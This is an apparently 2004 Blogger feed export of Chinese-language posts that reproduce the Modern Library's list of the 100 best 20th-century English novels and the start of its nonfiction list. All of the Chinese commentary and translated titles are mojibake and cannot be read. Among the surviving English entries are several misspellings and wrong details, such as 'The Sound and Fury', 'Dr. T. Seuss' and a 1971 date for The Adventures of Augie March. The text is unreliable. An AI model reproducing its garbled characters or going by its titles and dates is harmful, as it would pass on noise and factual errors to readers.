0, 0);">¡m₪H·ב®ץ₪s¡nTarzan of the Apes</span> <br /></li><li>1911¦~¡@¬°ך§@®a¡U®ז¹p¡UZane Grey, 1872-1939 <br />¡mµµ¦דִיֲO₪₪×÷ֳM₪h­ּ¡nRiders of the Purple Sage <br /></li><li>1920¦~¡¯­^°ך₪k°»±´₪p»¡®a¡U§J²תµ·¸¦¡UAgatha Christie, 1890-1976 <br /><span style="color: rgb(255, 0, 0);">¡m´µ®ץ÷¸´µ×÷¯«¯µ®׳¥ף¡nThe Mysterious Affair at Styles</span> <br /></li><li>1936¦~¡¯¬°ך÷t»¡®a¡B§@®a¡U¥d₪÷°ע¡UDale Carnegie 1888-1955 <br />¡m¦p¦ףִ¹±o×B₪ֽ©M¼vֵT₪H­ּ¡nHow to Win Friends and Influence Peoples <br /></li><li>1936¦~¡¯¬°ך₪p»¡®a¡U¦ּ«´÷¸¡UMargaret Mitchell, 1900-1947 <br /><span style="color: rgb(255, 0, 0);">¡mִֶ¡nGone with the Wind</span> <br /></li><li>1939¦~¡¯¬°ך°»±´₪p»¡®a¡U¿ת¼w°ַ¡URaymon Chandler, 1888-1959 <br /><span style="color: rgb(255, 0, 0);">¡m₪j¯v¡nThe Big Sleep</span> <br /></li><li>1939¦~¡@¬°ך§@®a¡U«ֲ´µ¯S¡UNathanael West, 1913-1940 <br />¡m½ְֲ־×÷₪י₪l¡nThe Day of the Locust <br /></li><li>1956¦~¡¯¬°ך₪p»¡®a¡U³ֱ®ץ²ת¡UGrace Metalious, 1924-1964 <br />¡m₪p«°­·«B¡nPeyton Place <br /></li><li>1957¦~¡@¬°ך¨אµ£ֵ×׫­´¡µe®a¡U¯ֱ¥ל´µ¡UDr. T. Seuss, 1904-1991 <br />¡m´U₪l¸ּ×÷¿¡nThe Cat in the Hat <br /></li><li>1961¦~¡@¬°ך¬ל₪₪p»¡®a¡U®µ®¦¡URobert A. Heinlein, 1907-1988 <br />¡m­¯¥ֽ°ך₪g×÷­¯¥ֽ₪H¡nStranger in a Strange Land <br /></li><li>1961¦~¡¯¬°ך§@®a¡U®°ַ¡UJoseph Heller, 1923- <br />¡m²ִ22±ר­x³W¡nCatch-22 <br /></li><li>1965¦~¡¯¬°ך₪p»¡®a¡U¥d×i¯S¡UTruman Capote, 1924-1984 <br />¡m§N¦ו¡nIn Cold Blood: A True Account of a Multiple Murder and Its Consequences <br /></li><li>1970¦~¡@¬°ךֲ¾´־¿ן₪ג₪־¹qµר¹B°¸`¥״¼½³ר­¡U×i¹y¡UJim Bouton, 1939- <br />¡m¥|ֳa²y¡nBall Four: My Life and Hard Times Throwing the Knuckleball in the Big Leagues <br /></li><li>1974¦~¡¯¬°ך®£©ֶ₪p»¡§@®a¡U¥v¸¦₪ׂ¡D×ק¡UStephen King, 1947- <br /><span style="color: rgb(255, 0, 0);">¡m¹ֵ²ת¡nCarrie</span> <br /></li><li>1987¦~¡@¬°ך·s»D°O×ּ¡B₪p»¡®a¡U¥מ₪ׂ¡UTom Wolfe, 1931- <br />¡mµך₪×÷²l₪ץ¡nThe Bonfire of the Vanities <br /></li></ul> <br /></span> -false - - - - -Letter Lego - -2004-12-08T22:44:56+08:00 -2004-12-08T19:11:56Z -2004-12-08T14:58:44Z - -tag:blogger.com,1999:blog-7678098.post-110251792411960959 -¡iֲא¸¡j20¥@¬צ¦₪j­^₪ו₪p»¡¥‏ִ‎ - -
    -20¥@¬צ¦₪j­^₪ו₪p»¡¥‏ִ‎ -
    -
    ₪‎¿¼‎¡@°ך®a¹ֿ®ְׁ]°ׁ¦ׂ²ױ¥N¥D¥פ
    -
    ¡@¡@¬°ךֲֵ¿O®ׁ«־×÷¡m·ם¥N₪ו®w¡n½s¿ט₪p²ױ©ף1998¦~07₪כ¶¡¿ן¥X₪F¥»¥@¬צ₪@¦₪j­^₪ו₪p»¡¡C³o¥ק±ֶ¦W®ׁ³ז₪@₪½¥¬¡A§Y₪°_ֱ|¥@°jֵT©Mµ½׳¡C°ך₪÷´Cֵיֱצ₪]³ר¾ֹ₪F³o¥ף®ר®§¡A¥i±₪×÷¬O³ּ¦h¶ָ¦C¥X«e₪Q₪j₪p»¡×÷¦W³ז¦׃₪w¡A₪@¯כֵ××ּ¹ן¥‏³¡₪@¦¥»₪p»¡¬O¨÷¨ַ₪´¥¼¯א₪@¿s¥‏»×¡Cµ§×ּ¦b¡m¬°ך×÷¹ֿ®ְׁ]¡n¡]American Libraries¡^ֲר»x1998¦~09₪כ¸¹₪W¬¨ל³o¥ק¦₪j₪p»¡×÷¦W³ז¡A₪D¸ױµ¬d¥X¨ה₪p»¡§@×ּ¡B®ׁ¦W×÷₪₪₪ו¦W÷¡]¥H₪@¯כ¦³₪₪ִ¶¥»¥B¦³³q«Uִ¶¦W×ּ¬°ְu¥‎¨ת¥־­ל«h¡A¦pµL₪₪ִ¶¥»¡A«h°ׁ¦ׂ¡m₪j­^¦¬ל¥‏®ׁ¡n¡B¡m₪j¬¦¬ל¥‏®ׁ¡n₪־¡m¼C¾פ¦¬ל¥‏®ׁ¡n₪₪₪§₪₪ִ¶¦W÷¡^¡A¨ֳ¥[₪W§@×ּ₪§°ךִy₪־¥Xש¦~¥N¡Aִ₪¦C©ף«ב¡A¥H¨ֵׁ××ּ©־¹ֿ®ְׁ]°ׁ¦ׂ¡C -
    - -
    ¡@¡@¦₪j₪p»¡₪§°י¿ן¡A×§ִ³ֳר§K¡FµM¦׃³o²¦³÷¬O¼fµר¥»¥@¬צ¸g¨ו₪p»¡₪§₪@¥ק°ׁ¦ׂ¦W³ז¡C¬J¬O­^₪ו₪p»¡¡A₪J¿ן×ּ°ךִy¦¥H­^¡B¬¨ג°ך¦¦h¼ֶ¡A·R÷¸ִץ¡B¦I₪ת§Q¡B₪d¨½¹F¡B¦L«׳µ¥¬ׂ¹י¹י¥R¼ֶ¦׃₪w¡FµM₪£¨£¥[®³₪j¡B¿D¬wµ¥¸₪j×÷­^»y¨t°ך®a₪§§@×ּ₪J¿ן¡A­ֻ¬O¿ע¾ׁ₪§¨ֶ¡C¦₪j®ׁ³ז₪₪¡A¥H­^°ך¯ט®§@®a±d©װ¼w¡]Joseph Conrad¡^₪J¿ן¥|¥»³ּ¦h¡F¨ה¥L¦p³ל¥ל´µ¡B÷ײ§J¯ַ¡B³ׂ­´µ¡B÷ײ´µ¯S¡B¸ג©i´µ¡B´ל₪ׂ¦U¦³₪T¥»₪J¿ן¡C³ל¥ל´µ×÷¡m₪׳¨½¦ט´µ¡n¬O²ִ₪@¦W¡A³o¥»®ׁ¦b¨ה¥L³ז¦ל¿ן©×÷¦W³ז¡]¦p¬°ך·ח¼w§J¨½₪ׂ¥Xש¬ד²¯Z×÷¡u¦₪j­^₪ו₪p»¡¡v₪־¯ֳ¬ש₪½¦@¹ֿ®ְׁ]°י¿ן×÷¡u¥@¬צ₪§®ׁ¡vµ¥¡^₪]³£¦W¦C«e­T¡A₪ו¾ַ¦a¦ל¦¥i»\´ֳ½׳©w¡C´N¥Xש¦~¥N¦׃¨¥¡A¥Xש³ּ¦­×÷¬O1900¦~×÷¡m¹ֵ²ת©f©f¡n©M¡m¦N©i·¡n¡F³ּ×ס×÷«h¬O1983¦~×÷¡mµµ­b¯ף¡n¡F1985¦~¥H«ב©|µL₪J¿ן§@«~¡A¥i¨£₪ו¾ַ§@«~»­n¸g±o°_®ֹ¶¡¦ֵׂח¡C -
    -
    ¡@¡@¥»¥Z«e¨ג´ֱ´¿³s¸¯ֳ¬ש₪½¦@¹ֿ®ְׁ]¡u¥@¬צ₪§®ׁ¡v¦W³ז¡]175÷״¡^¡A¦A¹ן·׃¥»´ֱ₪§¦₪j­^₪ו₪p»¡¡A¥»¥@¬צ₪§¸g¨ו¡A₪j¬שְ³¥i÷ֹ¯ַ¨ה₪₪¨o¡I -
    -
    -20¥@¬צ¦₪j­^₪ו₪p»¡ -
    -
      -
    1. ³ל¥ל´µ¡UJames Joyce¡U·R÷¸ִץ¡m₪׳¨½¦ט´µ¡nUlysses¡U1922 -
      -
    2. -
    3. -¶O¯ק³ֳַ¹¡UF. S. Fitzgerald¡U¬°ך¡m₪j¦כ₪p¶ַ¡nThe Great Gatsby¡U1925 -
      -
    4. -
    5. -³ל¥ל´µ¡UJames Joyce¡U·R÷¸ִץ¡m«C¦~ְֳ³N®a×÷µe¹³¡nA Portrait of the Artist as a Young Man¡U1916 -
      -
    6. -
    7. ¯ַ₪¬ל₪ׂ¡UVladimir Nabokov¡U«X¸ַ¬ִy¡m¬¥²ת¶נ¡nLolita¡U1955 -
      -
    8. -
    9. -»®­E¾₪¡UAldous Huxley¡U­^°ך¡m¬ִR·s¥@¬ֹ¡nBrave New World¡U1932 -
      -
    10. -
    11. ÷ײ§J¯ַ¡UWilliam Faulkner¡U¬°ך¡mֱnִ»P¼««ד¡nThe Sound and Fury¡U1929 -
      -
    12. -
    13. ®°ַ¡UJoseph Heller¡U¬°ך¡m²ִ22±ר­x³W¡nCatch-22¡U1961 -
      -
    14. -
    15. ¬_´µ°ַ¡UArthur Koestler¡U¦I₪ת§Q¡m₪₪₪ָ×÷¶ֲ·t¡nDarkness at Noon¡U1941 -
      -
    16. -
    17. ³ׂ­´µ¡UD. H. Lawrence¡U­^°ך¡m¨א₪l»P±¡₪H¡nSons and Lover¡U1913 -
      -
    18. -
    19. ¥v©Z¨©§J¡UJohn Steinbeck¡U¬°ך¡m¼««ד×÷¸²µו¡nThe Grapes of Wrath¡U1939 -
      -
    20. -
    21. ³ׂ·ח¡UMalcolm Lowry¡U­^°ך¡m¦b₪ץ₪s₪U¡nUnder the Volcano¡U1947 -
      -
    22. -
    23. ₪¯S°ַ¡USamuel Butler¡U­^°ך¡m²³¥ֽ₪§¸פ¡nThe Way of All Flesh¡U1903 -
      -
    24. -
    25. -¼«ֲ÷¸¡UGeorge Orwell¡U­^°ך¡m₪@₪E₪K¥|¡n1984¡U1949 -
      -
    26. -
    27. ®ז¹p₪ׂ´µ¡URobert Graves¡U­^°ך¡m§¡A§J³ׂ¨f¡nI, Claudius¡U1934 -
      -
    28. -
    29. -§d÷¸×¡UVirginia Woolf¡U­^°ך¡m¨ל¿O¶נ¥h¡nTo the Lighthouse¡U1927 -
      -
      -
    30. -
    31. ¼wµֱֹ¡UTheodore Dreiser¡U¬°ך¡m₪H¶¡´d¼@¡nAn American Tragedy¡U1925 -
      -
    32. -
    33. ÷¿§J°ַµ·¡UCarson McCullers¡U¬°ך¡m¦P¬O₪ׁ²P²_¸¨₪H¡nThe Heart Is a Longly Heart¡U1940 -
      -
    34. -
    35. -¶¾₪÷×G¡UKurt Vonnegut¡U¬°ך¡m²ִ₪­¸¹±O®_³ץ¡nSlaughterhouse-Five¡U1969 -
      -
    36. -
    37. -®J§Q´ֻ¡URalph Ellison¡U¬°ך¡mֱפ§־₪H¡nInvisible Man¡U1952 -
      -
    38. -
    39. µ¯S¡URichard Wright¡U¬°ך¡m₪g¥ֽ₪l¡nNative Son¡U1940 -
      -
    40. -
    41. ¨©°ת¡USaul Bellow¡U¬°ך¡m«B₪‎ֱת¼w´ֻ¡nHenderson the Rain King¡U1959 -
      -
    42. -
    43. ¶ר«¢©װ¡UJohn O'Hara¡U¬°ך¡m¦bֲִ°¨©װ×÷·|¦X¡nAppointment in Samarra¡U1934 -
      -
    44. -
    45. ¦h´µ©¬¯ֱ´µ¡UJohn Dos Passos¡U¬°ך¡m¬°ך¡nU. S. A.¡U1936 -
      -
    46. -
    47. ¦w¼w¥ֽ¡USherwood Anderson¡U¬°ך¡m₪p«°¬G¨ֶ¡nWinesburg, Ohio¡U1919 -
      -
    48. -
    49. -÷ײ´µ¯S¡UE. M. Forster¡U­^°ך¡m¦L«׳₪§®ָ¡nA Passage to India¡U1924 -
      -
    50. -
    51. ¸ג©i´µ¡UHenry James¡U¬°ך¡mֲFֱl¡nThe Wings of the Dove¡U1902 -
      -
    52. -
    53. ¸ג©i´µ¡UHenry James¡U¬°ך¡m©^¨ֿ°O¡nThe Ambassadors¡U1903 -
      -
    54. -
    55. ¶O¯ק³ֳַ¹¡UF. S. Fitzgerald¡U¬°ך¡m©]¥¼¥¡¡nTender Is the Night¡U1934 -
      -
    56. -
    57. ×k¹p÷¸¡UJames T. Farrell¡U¬°ך¡m¡u´µ¶נ¯ק¡D®װ¥§®¡v₪T³¡¦±¡nStuds Lonigan-trilogy¡U1935 -
      -
    58. -
    59. ÷ײ¯S¡UFord Madox Ford¡U­^°ך¡m¦n§L¡nThe Good Soldier¡U1915 -
      -
    60. -
    61. -¼«ֲ÷¸¡UGeorge Orwell¡U­^°ך¡m°×«¹A²ר¡nAnimal Farm¡U1945 -
      -
    62. -
    63. ¸ג©i´µ¡UHenry James¡U¬°ך¡m×ק¸J¡nThe Golden Bowl¡U1904 -
      -
    64. -
    65. ¼wµֱֹ¡UTheodore Dreiser¡U¬°ך¡m¹ֵ²ת©f©f¡nSister Carrie¡U1900 -
      -
    66. -
    67. ´ל₪ׂ¡UEvelyn Waugh¡U­^°ך¡m₪@±ֵ¹׀₪g¡nA Handful of Dust¡U1934 -
      -
    68. -
    69. -÷ײ§J¯ַ¡UWilliam Faulkner¡U¬°ך¡m¥Xֲl²{§־°O¡nAs I Lay Dying¡U1930 -
      -
    70. -
    71. µ״­¡URobert Penn Warren¡U¬°ך¡m°ך₪‎¨ׁ©^×÷₪H­ּ¡nAll the King's Men¡U1946 -
      -
    72. -
    73. «ֲ÷¸¼w¡UThornton Wilder¡U¬°ך¡m¸t¸פ©צ¡Dµ₪§¾פ¡nThe Bridge of SanLuis Rey¡U1927 -
      -
    74. -
    75. ÷ײ´µ¯S¡UE. M. Forster¡U­^°ך¡m¦¹±¡¥i°₪ׁ¡nHowards End¡U1910 -
      -
    76. -
    77. ¥]¼w·ֵ¡UJames Baldwin¡U¬°ך¡m¦V»a₪ׁ©Iֶ~¡nGo Tell It on the Mountain¡U1953 -
      -
    78. -
    79. ¸¯×L¡UGraham Greene¡U­^°ך¡m¨ֶ±¡×÷¯u¬¡nThe Heart of the Matter¡U1948 -
      -
    80. -
    81. -°×¥ֵ¡UWilliam Golding¡U­^°ך¡m»aֳַ₪‎¡nLord of the Flies¡U1954 -
      -
    82. -
    83. ­}°ע¡UJames Dickey¡U¬°ך¡m¸ׁ±ֿ¡nDeliverance¡U1970 -
      -
    84. -
    85. ְj«ֲ÷¸¡UAnthony Powell¡U­^°ך¡m»P®ֹ¥N¦X©ח×÷»Rֱ׀¡nA Dance to the Music of Time¡U1975 -
      -
    86. -
    87. »®­E¾₪¡UAldous Huxley¡U­^°ך¡m°w¾W¬¹ן¡nPoint Counter Point¡U1928 -
      -
    88. -
    89. ®©ת«ֲ¡UErnest Hemingway¡U¬°ך¡m©c¦´ֲ¶§₪S·׃§g¡nThe Sun Also Rise¡U1926 -
      -
    90. -
    91. ±d©װ¼w¡UJoseph Conrad¡U­^°ך¡m¯S°ָ¡nThe Secret Agent¡U1907 -
      -
    92. -
    93. ±d©װ¼w¡UJoseph Conrad¡U­^°ך¡m¿ױ´µ¯Sֳ¹²צ¡nNostromo¡U1904 -
      -
    94. -
    95. ³ׂ­´µ¡UD. H. Lawrence¡U­^°ך¡m±m­i¡nRainbow¡U1915 -
      -
    96. -
    97. ³ׂ­´µ¡UD. H. Lawrence¡U­^°ך¡mֵ·R₪₪×÷₪k₪H¡nWomen in Love¡U1920 -
      -
    98. -
    99. ¦ּ°ַ¡UHenry Miller¡U¬°ך¡m¥_¦^ֲk½u¡n¡]Tropic of Cancer¡U1934 -
      -
    100. -
    101. ±צ°ַ¡UNorman Mailer¡U¬°ך¡m»r×ּ©M¦÷×ּ¡nThe Naked and Dead¡U1948 -
      -
    102. -
    103. ֳ¹´µ¡UPhilp Roth¡U¬°ך¡m×i¯S¿ױ¥ל×÷©ך«ט¡nPortnoy's Complaint¡U1969 -
      -
    104. -
    105. ¯ַ₪¬ל₪ׂ¡UVladimir Nabokov¡U«X¸ַ¬ִy¡m»a¥ױ×÷₪ץ¡nPale Fire¡U1962 -
      -
    106. -
    107. ÷ײ§J¯ַ¡UWilliam Faulkner¡U¬°ך¡m₪K₪כ₪§¥ת¡nLight in August¡U1932 -
      -
    108. -
    109. §J¬¥₪ּ¡UJack Kerouac¡U¬°ך¡m¦b¸פ₪W¡nOn the Road¡U1957 -
      -
    110. -
    111. -÷~±K¯S¡UDashiell Hammett¡U¬°ך¡m°¨÷¸¥L₪§ֶN¡nThe Maltese Falcon¡U1930 -
      -
    112. -
    113. ÷ײ¯S¡UFord Madox Ford¡U­^°ך¡m¦ז¶i×÷¥״×÷¡nParade's End¡U1928 -
      -
    114. -
    115. µ״¹y¡UEdith Wharton¡U¬°ך¡m¯ֲ¯u¦~¥N¡nThe Age of Innocence¡U1920 -
      -
    116. -
    117. ²¦÷¸¨¹¡UMax Beerbohm¡U­^°ך¡m¦¶µ¥d¡D¦h₪R¥ֽ¡nZuleika Dobson¡U1911 -
      -
    118. -
    119. ¬f¦ט¡UWalker Percy¡U¬°ך¡m¼צ·R¹q¼v×÷₪H¡nThe Moviegoer¡U1961 -
      -
    120. -
    121. ³ֱֹֽ¡UWilla Cather¡U¬°ך¡mֱ`¥D±׀₪§¦÷¡nDeath Comes to Archbishop¡U1927 -
      -
    122. -
    123. ֱי´µ¡UJames Jones¡U¬°ך¡m¶ֳ¥@©¾»מ¡nFrom Here to Eternity¡U1951 -
      -
    124. -
    125. ©_¦ע¡UJohn Cheever¡U¬°ך¡mֲ׳´¶¨v¯S¬צ¨ֶ¡nThe Wapshot Chronicles¡U1957 -
      -
    126. -
    127. -¨F×L³ַ¡UJ. D. Salinger¡U¬°ך¡m³ֱ¥׀®·₪ג¡nThe Catcher in the Rye¡U1951 -
      -
    128. -
    129. -¬f°ע´µ¡UAnthony Burgess¡U­^°ך¡m¸ֻ¦³µo±ר×÷¾ן₪l¡nA Clockwork Orange¡U1962 -
      -
    130. -
    131. ₪ע©i¡UW. Somerset Maugham¡U­^°ך¡m₪H©ֿEֲך¡nOf Human Bondage¡U1915 -
      -
    132. -
    133. ±d©װ¼w¡UJoseph Conrad¡U­^°ך¡m¶ֲ·t₪§₪¡nHeart of Darkness¡U1902 -
      -
    134. -
    135. ¼B©צ₪h¡USinclair Lewis¡U¬°ך¡m₪jµף¡nMain Street¡U1920 -
      -
    136. -
    137. µ״¹y¡UEdith Wharton¡U¬°ך¡mֵw¼ײ₪§®a¡nThe House of Mirth¡U1905 -
      -
    138. -
    139. ¹F¹p÷¸¡ULawrence Durrell¡U­^°ך¡m¨ָ¾ת₪s₪j¥|³¡¦±¡nThe Alexandraia Quartet¡U1960 -
      -
    140. -
    141. ¥נ´µ¡URichard Hughes¡U­^°ך¡m₪ת¶R¥[×÷­·¡nA High Wind in Jamaica¡U1929 -
      -
    142. -
    143. ­@×i¦ױ¡UV. S. Naipaul¡U₪d¨½¹F¡m²¦´µ¥ֻ«ה¥‎¥ֽ₪§«־¡nA House for Mr. Biswas¡U1961 -
      -
    144. -
    145. «ֲ´µ¯S¡UNathaniel West¡U¬°ך¡m½ְֲ־×÷₪י₪l¡nThe Day of the Locust¡U1939 -
      -
    146. -
    147. ®©ת«ֲ¡UErnest Hemingway¡U¬°ך¡m¾װ¦a¬K¹¡nA Farewell to Arms¡U1929 -
      -
    148. -
    149. ´ל₪ׂ¡UEvelyn Waugh¡U­^°ך¡m¿W®a·s»D¡nScoop¡U1938 -
      -
    150. -
    151. µ·©¬§J¡UMuriel Spark¡U­^°ך¡mֳ£¡D¥¬ֳ¹­}₪p©j×÷«C¬K¡nThe Prime of Miss Jean Brodie¡U1961 -
      -
    152. -
    153. -³ל¥ל´µ¡UJames Joyce¡U·R÷¸ִץ¡m¬°×ג¥§®¦uֶF¡nFinnegans Wake¡U1939 -
      -
    154. -
    155. ¦N₪R×L¡URudyard Kipling¡U­^°ך¡m×ק©i¡nKim¡U1901 -
      -
    156. -
    157. ÷ײ´µ¯S¡UE. M. Forster¡U­^°ך¡mµ¡¥~¦³ֲֵ₪ׁ¡nA Room with a View¡U1908 -
      -
    158. -
    159. ´ל₪ׂ¡UEvelyn Waugh¡U­^°ך¡m¹ֲ_¥ױ²ר¡nBride shead Revisited¡U1945 -
      -
    160. -
    161. ¨©°ת¡USaul Bellow¡U¬°ך¡mש_¥¿¶ַ¡nThe Adventures of Augie March¡U1971 -
      -
    162. -
    163. ¥v¹F®ז¯ַ¡UWallace Stegner¡U¬°ך¡m¦w¯v×÷₪ׁ¨ֿ¡nAngle of Repose¡U1971 -
      -
    164. -
    165. ­@×i¦ױ¡UV. S. Naipaul¡U₪d¨½¹F¡m×e¦±¡nA Bend in the River¡U1979 -
      -
    166. -
    167. ְj®¦¡UElizabeth Bowen¡U­^°ך¡m₪₪§¦÷¡nThe Death of the Heart¡U1938 -
      -
    168. -
    169. ±d©װ¼w¡UJoseph Conrad¡U­^°ך¡m¦N©i·¡nLord Jim¡U1900 -
      -
    170. -
    171. ¹F¯Sֳ¹¡UE. L. Doctorow¡U¬°ך¡mְן₪h¼ײ¡nRagtime¡U1975 -
      -
    172. -
    173. ¨©₪÷¯S¡UArnold Bennett¡U­^°ך¡m¦ׁ°₪H×÷¬G¨ֶ¡nThe Old Wives' Tale¡U1908 -
      -
    174. -
    175. ­´°¡UJack London¡U­^°ך¡m³¥©×÷©I³ך¡nThe Call of the Wild¡U1903 -
      -
    176. -
    177. ®ז×L¡UHenry Green¡U­^°ך¡m·R¡nLoving¡U1945 -
      -
    178. -
    179. ¾|¦ט­}¡USalman Rushdie¡U¦L¸ַ­^ִy¡m₪ָ©]×÷«ִ₪l­ּ¡nMidnight's Children¡U1981 -
      -
    180. -
    181. ¦ׂ¼w«ֲ÷¸¡UErskine Caldwell¡U¬°ך¡mµׂ¯ף¸פ¡nTobacco Road¡U1932 -
      -
    182. -
    183. -¥ּ­@²ִ¡UWilliam Kennedy¡U¬°ך¡mµµ­b¯ף¡nIronweed¡U1983 -
      -
    184. -
    185. ¦ע°ַ´µ¡UJohn Fowles¡U­^°ך¡m¥e¬P®a¡nThe Magus¡U1966 -
      -
    186. -
    187. ¨½µ·¡UJean Rhys¡U­^°ך¡m¿סֱן×÷ִ¦®¡nWide Sargasso¡U1966 -
      -
    188. -
    189. ְq¦h§J¡UIris Murdoch¡U­^°ך¡m¦b÷פ₪U¡nUnder the Net¡U1954 -
      -
    190. -
    191. -´µ¸¦¶©¡UWilliam Styron¡U¬°ך¡mִ¬µב¨ָ×÷§א¾¡nSophie's Choice¡U1979 -
      -
    192. -
    193. -ְj÷¸´µ¡UPaul Bowles¡U¬°ך¡m¾B½××÷₪ׁ×ֵ¡nThe Sheltering Sky¡U1949 -
      -
    194. -
    195. -³ֽ®¦¡U -James M. Cain¡U¬°ך¡m¶l®tֱ`«צ¨ג¦¸¹a¡nThe Postman Always Rings Twice¡U1934 -
      -
    196. -
    197. ­נ§Q÷¡UJ. P. Donleavy¡U¬°ך¡m²´½u¡nThe Ginger Man¡U1955 -
      -
    198. -
    199. ¶נ×ק¹y¡UBooth Tarkington¡U¬°ך¡m°¶₪j×÷¦w§B´ֻ´µ¡nThe Magnificent Ambersons¡U1918 -
      -
    200. -
    -
    -
    -
    -
    -false -
    - - - -Letter Lego - -2004-12-08T22:13:19+08:00 -2004-12-08T19:22:19Z -2004-12-08T14:25:58Z - -tag:blogger.com,1999:blog-7678098.post-110251595832598283 -¡iֲא¸¡j20¥@¬צ¦₪j­^₪ו«D₪p»¡¥‏ִ‎ - -
    -20¥@¬צ¦₪j­^₪ו«D₪p»¡¥‏ִ‎ -
    -

    ₪‎¿¼‎¡@°ך®a¹ֿ®ְׁ]°ׁ¦ׂ²ױ¥D¥פ

    -
    ¡@¡@¥»±Mִז´¿©ף¥ֱ°ך88¦~2₪כ¸¹³ר¾ֹ¨ֳ¥Z¥X¬°ךֲֵ¿O®ׁ«־¡]Random House¡^¡m·ם¥N₪ו®w¡n¡]Modern Library¡^©ׂ¿ן¥X×÷¥@¬צ¦₪j­^₪ו₪p»¡¥‏³¡¦W³ז¡A¥i§@¬°°ך₪÷¹ֿ®ְׁ]¿ןֱ¥~₪ו¹ֿ®ׁ₪§°ׁ¦ׂ¡C88¦~05₪כ¸¹¥ח³ר¾ֲֵֹ¿O®ׁ«־¦A±µ¦Aְy±N©ף04₪כ29₪י¡u¬°ך¹ֿ®ׁ³ױִ‎·|¡v¡]BookExpo America¡^₪₪«ֵ¥¬¡m·ם¥N₪ו®w¡n½s¿ט©e­·|©ׂ¿ן¥X×÷¥»¥@¬צ¦₪j³ּ¨־­^₪ו«D₪p»¡¡]100 best nonfiction¡^¡C¨ֶ«ב¡A°ך₪÷³ר¥Zֵ×®ׁ¡B¥Xשש­±ֱצ´¿¦³±M₪ו³ר¾ֹ¡AµM₪´¶ָ­­©ףֲ²²₪µn¥X«e₪Q¦W¦W³ז¦׃₪w¡Cµ§×ּ©ף÷פ¸פ₪Wְע±o¦¹¦₪j­^₪ו«D₪p»¡®ׁ³ז«ב¡A₪D½יִע88¦~02₪כ¸¹₪§÷כ¯«»P¦®½ל¡A±N¦¹¦₪j­^₪ו«D₪p»¡₪§®ׁ³ז₪©¥H₪₪ִ¶¡A¨ֳ÷ֹ¶q¬d¥X§@×ּ₪§¥ֽ¨ע¦~¡A¨ׁ¹ֿ®ְׁ]¿ן®ׁ©־₪@¯כֵ××ּ₪F¸ׁ°ך¥~¸g¨ו¹ֿ®ׁ₪§°ׁ¦ׂ¡A±q¬dְֻ¹Lµ{₪₪¡Aµ§×ּµo²{­^₪ו«D₪p»¡₪§¸g¨ו¹ֿ®ׁ³Qֲ½¦¨₪₪₪ו×÷₪ס²v»·₪ס₪p»¡₪ײ³\¦h¡A©ׂ¥H¡A°ך₪÷ֵ××ּ¹ן³o₪@¦¥»®ׁ¡A®£©ָ¦³₪£₪ײ·|ִ±±o­¯¥ֽ¡A³o©־³\₪]¬O­ָ±o§­ּ¥Xש¬ֹ«ה¦ׂ×÷¡C -
    - -
    ¡@¡@¦¹¥ק®ׁ³ז×÷¯¥¢¬«H»P¦₪j­^₪ו₪p»¡₪@¼ֻ¡A₪]₪@©w·|₪°_₪£₪ײ×÷µ½׳¡C¦₪ײ₪j®a₪@¬₪S¬O­^¬¨ג°ך×÷§@«~´X¥G¥]¿ל¥‏³¡®ׁ³ז¡CµM«hµ§×ּ­n±j½ױ×÷¬O¦₪ײֲֵ¿O®ׁ«־µ¹₪j®a₪@¥ק₪פ·ְַ³¬O₪£¿ש×÷®ׁ³ז°ׁ¦ׂ₪F¡A¦©ף©P©µ»P§_¡A¨ה¥¦³ז¦ל©־­׃₪H₪´¥iִ~ִע´£¥X©־¥[¥H¸ֹ¥R¡C¥t¥~¡Aֲֵ¿O®ׁ«־₪]¦b÷פ¸פ₪W¶}©ס¨ֵׁ××ּ²¼¿ן¦₪j®ׁ³ז¡A¦W³ז¥ח¦C¦b©e­·|©ׂ¿ן₪§®ׁ³ז®ַ¡A¥H¨ׁ¹ן·׃°ׁ¦ׂ¡Cֵ××ּ²¼¿ן¦₪j®ׁ³ז₪₪¡A¥H¶P§B¯S¡]L.Ron Hubbard¡^×÷¡m²{¥N₪²z°·±d¬ל¾ַ¡n¡]Dianetics : the Modern Science of Mentel Health¡^₪@®ְׁע±o5,806²¼¡A±ֶ²ִ₪@¦W¡C -
    -
    ¡@¡@µ§×ּ¬d¦ׂ¦₪j®ׁ³ז¡A°ׁ¦ׂ©־§Q¥־₪U¦C₪u¨ד®ׁ¡G¡m₪j­^¦¬ל¥‏®ׁ¡n¡B¡m₪j¬¦¬ל¥‏®ׁ¡n¡B¡m¼C¾פ¦¬ל¥‏®ׁ¡n₪§₪₪₪וש¥H₪־Current Biography¡BWho is Who in America¡BWriter Directory¡BContemporary Author¡BInternational Who is Who¡BDictionary of National Biography¡]DNB¡^¡BAmerican National Biography¡]ANB¡^¡BBooks in Print¡]BIP¡^¡BAmerican Book Publishing Record¡]ABPR¡^₪־¥ת·×©×÷Marquis Who's Who¡BGlobal BIPµ¥¡Aֱצ¯׃®ֹ¨}¦h¡A±©ֱ[»~₪´¦b©ֳׂר§K¡A¯S§O¬O¦b®ׁ¦W×÷₪₪ִ¶³¡₪ְ¡A₪´´ֱ«₪ט®a₪©¥H«¥¿¡C -
    -
    - 20¥@¬צ¦₪j­^₪ו«D₪p»¡ -
    -
      -
    1. ¬°ך¾ת¥v¾ַ®a¡@¨ָ·ם´µ¡]Henry Adams, 1838-1918¡^×÷¦¶ַ¡m¦כ§Q¨ָ·ם´µ×÷±׀¨|¡n¡]The Education of Henry Adams¡^ -
      -
    2. -
    3. -¬°ך₪²z¾ַ®a¡B­ץ¾ַ®a¡@¸ג©i₪h¡@William James, 1842-1910¡@¡m©v±׀¸gֵח÷״÷״¡n¡@The Varieties of Religious Experience -
      -
    4. -
    5. ¬°ך¶ֲ₪H±׀¨|®a÷[×ְ·|§ן­²×ּ¡@µ״²±¹y¡@Booker T. Washington, 1856-1915¡@¡m¶W¶V¥£§׀¡n¡@Up from Slavery -
      -
    6. -
    7. -­^°ך₪ו¾ַ®a¡@§d÷¸×¡@Virginia Woolf, 1882-1941¡@×ר½g½׳₪ו¡m¦₪v×÷©׀¶¡¡n¡@A Room of One's Own -
      -
    8. -
    9. -¬°ך¥ֽ÷A¾ַ®a¡@¥d»¹₪k₪h¡@Rachel Carson, 1907-1964¡@¡m±IְR×÷¬K₪ׁ¡n¡@Silent Spring -
      -
    10. -
    11. ­^°ך¸ײ₪H¡@¦ד²₪¯S¡@T.S.Eliot,¡@1888-1965¡@¡m1917-1932¦~½׳₪ו¿ן¶°¡n¡@Selected Essays, 1917-1932 -
      -
    12. -
